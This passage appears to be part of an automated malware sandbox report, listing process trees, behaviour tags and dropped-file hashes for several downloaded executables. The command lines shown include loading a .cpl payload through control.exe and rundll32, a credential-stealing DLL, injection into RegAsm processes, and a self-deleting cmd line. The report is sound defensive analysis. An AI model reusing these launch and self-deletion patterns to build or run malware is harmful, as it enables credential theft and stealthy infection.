C:\Users\Admin\AppData\Local\Temp\1000027001\linda5.exe"C:\Users\Admin\AppData\Local\Temp\1000027001\linda5.exe"4⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\Y_GQtM.cpL",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\Y_GQtM.cpL",6⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\Y_GQtM.cpL",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\Y_GQtM.cpL",8⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main4⤵
- Blocklisted process makes network request
- Accesses Microsoft Outlook profiles
-
C:\Users\Admin\AppData\Local\Temp\1000028001\wish.exe"C:\Users\Admin\AppData\Local\Temp\1000028001\wish.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 15123⤵
- Program crash
-
C:\Users\Admin\Downloads\WalkenBoost.exe"C:\Users\Admin\Downloads\WalkenBoost.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"3⤵
-
C:\Users\Admin\Downloads\file.exe"C:\Users\Admin\Downloads\file.exe"2⤵
-
C:\Users\Admin\Downloads\file.exe"C:\Users\Admin\Downloads\file.exe"3⤵
- Checks computer location settings
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Downloads\file.exe" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- NTFS ADS
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3456.0.1004375223\1033074977" -parentBuildID 20200403170909 -prefsHandle 1632 -prefMapHandle 1624 -prefsLen 1 -prefMapSize 222097 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3456 "\\.\pipe\gecko-crash-server-pipe.3456" 1748 gpu4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3456.3.2033123306\353168543" -childID 1 -isForBrowser -prefsHandle 2352 -prefMapHandle 2556 -prefsLen 353 -prefMapSize 222097 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3456 "\\.\pipe\gecko-crash-server-pipe.3456" 2500 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3456.13.1459989811\1408340503" -childID 2 -isForBrowser -prefsHandle 3696 -prefMapHandle 3692 -prefsLen 6509 -prefMapSize 222097 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3456 "\\.\pipe\gecko-crash-server-pipe.3456" 3764 tab4⤵
-
C:\Users\Admin\Downloads\yy.exe"C:\Users\Admin\Downloads\yy.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe"3⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Users\Admin\Downloads\HVUIOPMN.exe"C:\Users\Admin\Downloads\HVUIOPMN.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe"3⤵
-
C:\Users\Admin\Downloads\ChromeSetup.exe"C:\Users\Admin\Downloads\ChromeSetup.exe"2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\2611.exeC:\Users\Admin\AppData\Local\Temp\2611.exe2⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\Eshwsfeuryqqffi.tmp",Qiysidaatietut3⤵
- Blocklisted process makes network request
- Checks processor information in registry
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 172134⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 5283⤵
- Program crash
-
C:\Users\Admin\Downloads\64.exe"C:\Users\Admin\Downloads\64.exe"2⤵
-
C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe"C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe" --install-archive="C:\Users\Admin\Downloads\CR_20E12.tmp\CHROME.PACKED.7Z"3⤵
- Registers COM server for autorun
- Modifies registry class
-
C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exeC:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Chromnius\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Chromnius --annotation=ver=109.0.5386.0 --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x7ff726067f80,0x7ff726067f90,0x7ff726067fa04⤵
-
C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe"C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe" --verbose-logging --create-shortcuts=0 --install-level=04⤵
-
C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exeC:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Chromnius\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Chromnius --annotation=ver=109.0.5386.0 --initial-client-data=0x288,0x28c,0x290,0x264,0x294,0x7ff726067f80,0x7ff726067f90,0x7ff726067fa05⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --from-installer4⤵
- Checks computer location settings
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exeC:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Chromnius\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Chromnius\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Chromnius --annotation=ver=109.0.5386.0 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffbdd04de28,0x7ffbdd04de38,0x7ffbdd04de485⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=gpu-process --start-stack-profiler --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:25⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2336 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --start-stack-profiler --mojo-platform-channel-handle=2300 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=renderer --first-renderer-process --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=3756 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=renderer --extension-process --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2292 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4132 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=renderer --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --mojo-platform-channel-handle=4532 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4800 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4884 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4876 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5164 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=renderer --extension-process --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --mojo-platform-channel-handle=5024 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5308 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
- Modifies system certificate store
-
C:\Users\Admin\Downloads\LoaderAVX.exe"C:\Users\Admin\Downloads\LoaderAVX.exe"2⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\FILE-WATCHER.SLN2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5008 -ip 50081⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6072 -ip 60721⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1784 -ip 17841⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f4 0x4c01⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6540 -ip 65401⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1372 -ip 13721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4332 -ip 43321⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 540 -ip 5401⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5948 -ip 59481⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeC:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 4162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5336 -ip 53361⤵
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeC:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 4162⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4392 -ip 43921⤵
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeC:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 316 -s 4162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 316 -ip 3161⤵
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeC:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6224 -s 4162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6224 -ip 62241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2352 -ip 23521⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeC:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 4162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2888 -ip 28881⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\mozglue.dllFilesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
C:\ProgramData\nss3.dllFilesize
1.2MB
MD5bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
28KB
MD5322ecbe70802f8b86a839114056dc625
